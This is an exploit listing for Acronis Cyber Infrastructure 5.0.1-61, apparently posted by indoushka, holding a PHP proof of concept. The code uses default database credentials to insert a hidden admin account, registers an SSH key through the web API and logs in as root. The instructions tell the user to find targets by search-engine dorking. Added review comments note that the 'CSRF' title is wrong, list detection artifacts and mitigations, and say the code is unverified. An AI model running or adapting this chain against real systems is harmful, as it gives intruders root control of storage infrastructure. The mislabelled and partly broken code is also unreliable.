## https://sploitus.com/exploit?id=PACKETSTORM:182005
=============================================================================================================================================  
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add Admin Vulnerability |
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engine.
  
[+] add new admin.  
  
[+] Line 83 + 100 +138 + 202 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php
  
[+] PayLoad :  
  
<?php  
  
/**
 * Proof-of-concept listing published with the advisory, reproduced as posted
 * (not verified to run as-is).
 *
 * NOTE(review): the advisory title says "CSRF", but no method in this class
 * issues a cross-site request. What the code relies on is:
 *   1. network reachability of the PostgreSQL port passed to exploit(), and
 *   2. the database credentials hard-coded in exploit() (vstoradmin/vstoradmin).
 * With those, it writes a new account into the "keystone" database, logs in to
 * the web API with that account, registers an SSH public key through the API,
 * and then opens an SSH session as root.
 *
 * Defender-relevant observables, each tied to a step below:
 *   - new rows in "user", "local_user", "password" and "assignment";
 *   - a login to /api/v2/login by an account nobody provisioned;
 *   - a POST to /api/v2/<cluster id>/ssh-keys;
 *   - a root SSH login using a key that was registered moments earlier.
 * Mitigation follows from the two preconditions: do not expose the database
 * port to untrusted networks and do not leave the default database credentials
 * in place.
 */
class AcronisExploit {
// SSH connection resource set by doSshLogin() on successful authentication.
private $sshSocket;
// PostgreSQL connection set by exploit() via pg_connect().
private $dbConn;
// Cluster id returned by getClusterId(), stored by exploit().
private $clusterId;

/**
 * Start with no SSH session, no database connection and no cluster id.
 */
public function __construct() {
// Initialize default values
$this->sshSocket = null;
$this->dbConn = null;
$this->clusterId = null;
}

/**
 * Write a new account and an admin role assignment directly into the database.
 *
 * Touches four tables in order: "user", "local_user", "password", "assignment".
 * All statements are built by string interpolation; within this file the
 * arguments come only from exploit(), which generates them locally.
 *
 * @param string $username login name stored in "local_user"
 * @param string $userid   id stored in "user", "local_user" and "assignment"
 * @param string $password cleartext password; it is bcrypt-hashed before storage
 *                         but also echoed to stdout in cleartext
 * @return bool false if one of the checked queries fails, true otherwise
 */
public function addAdminUser($username, $userid, $password) {
echo "Creating admin user $username with userid $userid\n";

// Insert new admin user into the user table
$resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");
if (!$resQuery) return false;

// Pick the next "local_user" id as MAX(id) + 1, then insert the row
$resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");
if (!$resQuery) return false;

$idLuser = pg_fetch_result($resQuery, 0, 0) + 1;
$resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");
if (!$resQuery) return false;

// Hash the password with bcrypt and store it with today's date.
// The echo below prints both the cleartext password and the hash.
$passwordHash = password_hash($password, PASSWORD_BCRYPT);
echo "Setting password $password with hash $passwordHash\n";
$today = date('Y-m-d');
$resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");
if (!$resQuery) return false;

// Look up the 'admin' project (domain 'default') and the 'admin' role, then
// write an "assignment" row built from what postgresQuery() returned.
// A 'UserProject' assignment row for an unknown user id is the artifact to
// look for when auditing this table.
$idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");
$idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");
echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";
$this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");

echo "Successfully created admin user $username with password $password\n";
return true;
}

/**
 * Run one SQL statement on the stored connection.
 *
 * @param string $query SQL text passed to pg_query() unchanged
 * @return mixed the pg_query() result, or false after printing pg_last_error()
 */
private function postgresQuery($query) {
$result = pg_query($this->dbConn, $query);
if (!$result) {
echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";
return false;
}
return $result;
}

/**
 * Open an SSH connection and authenticate with a key pair read from files.
 *
 * The port is fixed at 22 here; the $sshPort argument of exploit() is not
 * passed to this method.
 *
 * @param string $ip     host to connect to
 * @param string $user   account name used for public-key authentication
 * @param array  $sshKey array with 'public' and 'private' key file paths
 * @return bool true when authentication succeeds (connection kept in $sshSocket)
 */
public function doSshLogin($ip, $user, $sshKey) {
$connection = ssh2_connect($ip, 22);
if (!$connection) {
echo "SSH connection failed\n";
return false;
}

if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {
$this->sshSocket = $connection;
return true;
} else {
echo "SSH authentication failed\n";
return false;
}
}

/**
 * POST a JSON username/password pair to the web portal login endpoint.
 *
 * The URL host is the literal placeholder "target-uri". Success is decided by
 * a substring match on the response body, not by the HTTP status code.
 *
 * @param string $name account name
 * @param string $pwd  account password
 * @return bool true if the response body contains '"code":200'
 */
public function aciLogin($name, $pwd) {
$postData = json_encode([
'username' => $name,
'password' => $pwd
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

return (strpos($response, '"code":200') !== false);
}

/**
 * GET the cluster list from the web API and return the first cluster's id.
 *
 * @return mixed value of data[0].id in the decoded JSON response, or null when
 *               that key is absent
 */
public function getClusterId() {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

$data = json_decode($response, true);
if (isset($data['data'][0]['id'])) {
return $data['data'][0]['id'];
}

return null;
}

/**
 * Reserve a temporary file name and call ssh2_genkeypair() with it.
 *
 * The public key path is the private key path plus ".pub". Nothing in this
 * class removes these files afterwards.
 *
 * @return array array with 'private' and 'public' file paths
 */
private function generateSshKeys() {
$privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');
$publicKey = $privateKey . '.pub';
ssh2_genkeypair($privateKey, $publicKey);
return [
'private' => $privateKey,
'public' => $publicKey
];
}

/**
 * POST an SSH key registration request for a cluster to the web API.
 *
 * The value of $sshKey is sent twice: as the top-level 'key' and inside the
 * 'SshKeys' event payload. Success is decided by a substring match on the
 * response body. From a monitoring point of view, a request to this endpoint
 * from a freshly created account is the event worth alerting on.
 *
 * @param mixed $sshKey    value placed in the 'key' fields of the request
 * @param mixed $clusterId cluster id interpolated into the URL path
 * @return bool true if the response body contains '"task_id"'
 */
public function uploadSshKey($sshKey, $clusterId) {
$postData = json_encode([
'key' => $sshKey,
'event' => [
'name' => 'SshKeys',
'method' => 'post',
'data' => [
'key' => $sshKey
]
]
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

return (strpos($response, '"task_id"') !== false);
}

/**
 * Run the whole chain: database connect, account creation, API login,
 * cluster lookup, key generation, key upload, SSH login.
 *
 * The database credentials are hard-coded in the connection string below;
 * $sshPort, $username and $password are accepted but not referenced in this
 * body. Every precondition the chain depends on is therefore visible in the
 * first statement: a reachable database port and unchanged default
 * credentials for the "keystone" database.
 *
 * @param string $rhost    database and SSH host
 * @param int    $dbPort   PostgreSQL port
 * @param int    $sshPort  not referenced in this method
 * @param string $username not referenced in this method
 * @param string $password not referenced in this method
 * @return bool true if every checked step succeeded, false at the first failure
 */
public function exploit($rhost, $dbPort, $sshPort, $username, $password) {
// Connect to PostgreSQL with the fixed vstoradmin/vstoradmin credentials
$this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");
if (!$this->dbConn) {
echo "Could not connect to PostgreSQL database\n";
return false;
}

// Generate an 8-character login name, a 16-character password and a
// 32-hex-digit user id, then write the account into the database
$newUsername = substr(md5(rand()), 0, 8);
$newPassword = substr(md5(rand()), 0, 16);
$userId = bin2hex(random_bytes(16));
$this->addAdminUser($newUsername, $userId, $newPassword);

// Login to Acronis
if (!$this->aciLogin($newUsername, $newPassword)) {
echo "Failed to login to Acronis\n";
return false;
}

// Get cluster ID
$this->clusterId = $this->getClusterId();
if (!$this->clusterId) {
echo "Failed to get cluster ID\n";
return false;
}

// Generate SSH keys
$sshKey = $this->generateSshKeys();

// Upload SSH public key (the 'public' entry of the generated pair is passed)
if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {
echo "Failed to upload SSH public key\n";
return false;
}

// SSH login as root with the generated key pair
if (!$this->doSshLogin($rhost, 'root', $sshKey)) {
echo "SSH login failed\n";
return false;
}

echo "Exploit successful, SSH session established!\n";
return true;
}
}
  
// Example usage: 'target-ip' is a placeholder host, 6432 is the database port
// and 22 the SSH port argument. The last two arguments are passed through, but
// exploit() builds its database connection string from its own hard-coded
// vstoradmin/vstoradmin pair rather than from these parameters.
$exploit = new AcronisExploit();
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');
  
  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================